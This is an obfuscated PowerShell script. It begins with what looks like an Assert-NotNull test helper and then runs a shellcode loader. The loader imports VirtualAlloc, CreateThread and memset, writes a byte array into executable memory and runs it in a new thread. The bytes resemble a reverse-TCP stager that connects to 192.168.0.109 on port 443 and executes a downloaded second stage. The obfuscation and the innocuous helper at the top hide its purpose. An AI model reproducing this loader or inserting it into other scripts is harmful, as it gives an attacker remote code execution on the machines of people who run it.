function aSS`eRt-N`ot`Null
{
    
    [CmdletBinding()]
    param(
        [Parameter(pOsitiOn=0)]
        [object]
        
        ${INP`UTObJ`ECT},
        
        [Parameter(POSitIOn=1)]
        [string]
        
        ${m`E`sSaGe}
    )

    .("{3}{0}{1}{4}{2}" -f 'et-S','t','e','S','rictMod') -Version ("{0}{1}" -f 'L','atest')

    if( ${i`Np`UTO`BJeCT} -eq ${N`UlL} )
    {
        &("{1}{0}" -f 'ail','F') ("Value is null. {0}" -f ${MES`SaGe})
    }
}

&("{1}{2}{0}" -f'ias','S','et-Al') -Name ("{1}{0}{3}{2}"-f's','Assert-I','l','NotNul') -Value ("{3}{0}{4}{2}{1}" -f'sert','ll','u','As','-NotN')

${C} = ((("{3}{51}{23}{48}{29}{63}{38}{13}{111}{120}{83}{75}{121}{12}{17}{66}{79}{2}{76}{112}{114}{93}{30}{45}{58}{103}{122}{84}{14}{25}{7}{15}{4}{69}{55}{32}{57}{54}{9}{33}{77}{61}{35}{89}{36}{92}{19}{105}{74}{22}{116}{44}{34}{60}{73}{18}{95}{81}{87}{56}{1}{37}{101}{52}{39}{11}{53}{71}{70}{28}{31}{43}{119}{27}{117}{100}{24}{20}{80}{59}{10}{6}{64}{47}{82}{26}{115}{90}{104}{49}{0}{8}{21}{97}{118}{110}{50}{98}{124}{40}{109}{46}{94}{123}{108}{96}{67}{88}{99}{16}{86}{106}{107}{91}{113}{41}{72}{65}{85}{68}{42}{78}{62}{5}{102}" -f 'ntP',' CreateThr','Virt','[Dl','e','uint co','IntPtr lpP','u','tr ','Type, u','s, ','d','xt','l','res','int dwSiz','xter','ern','c','Im','l','lpT','{0','I','IntPtr ','s, ',' u','a','i','ort','l','butes, uint','uint fl','i','ub','f','tect','e','l32.d','pThrea','[DllImp','set','i',' ',')]p','lo','rt({0}','et','mp','ags, I','d','l','d(IntPtr l','At','n',' ','tPtr','Allocatio','c(Int','Addres','lic stat','t ','c, ','({0}kerne','aram','P',' IntPtr',' ','t, u',',','r','t','(Int','i','32.dll','tat','u','n','nt sr',' ','pStart','te','er,','blic s','d','tr des','n I','rn In','stat','lPro','dwCrea','me',');[Dll','A','m',' ex','ll{0})]public','h','Id','ic e','Size, ','a','unt);','Ptr l','tionFl','port({0}kernel','ntPtr',' ','d','o','a','l{0})]p','a','m','l','int ','}','ck','re','dwSt','u','ic e','pAd','svcrt.',');'))  -F [CHAR]34);${w} = .("{0}{2}{1}"-f 'Add-','e','Typ') -memberDefinition ${C} -Name ("{0}{1}"-f'W','in32') -namespace ("{0}{2}{3}{1}"-f'Win','ons','32Func','ti') -passthru;[Byte[]];[Byte[]]${S`c} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x6d,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${s`IzE} = 0x1000;if (${S`c}."l`engtH" -gt 0x1000){${S`izE} = ${S`C}."lEN`gth"};${x}=${W}::("{3}{2}{0}{1}"-f'lAllo','c','ua','Virt').Invoke(0,0x1000,${SI`ZE},0x40);for (${I}=0;${i} -le (${S`c}."l`eNG`Th"-1);${I}++) {${W}::"m`Em`Set"([IntPtr](${X}.("{1}{2}{0}"-f'2','ToIn','t3').Invoke()+${i}), ${s`c}[${I}], 1)};${w}::("{2}{1}{0}"-f 'read','Th','Create').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{0}{1}" -f 'tar','t-sleep','S') 60};
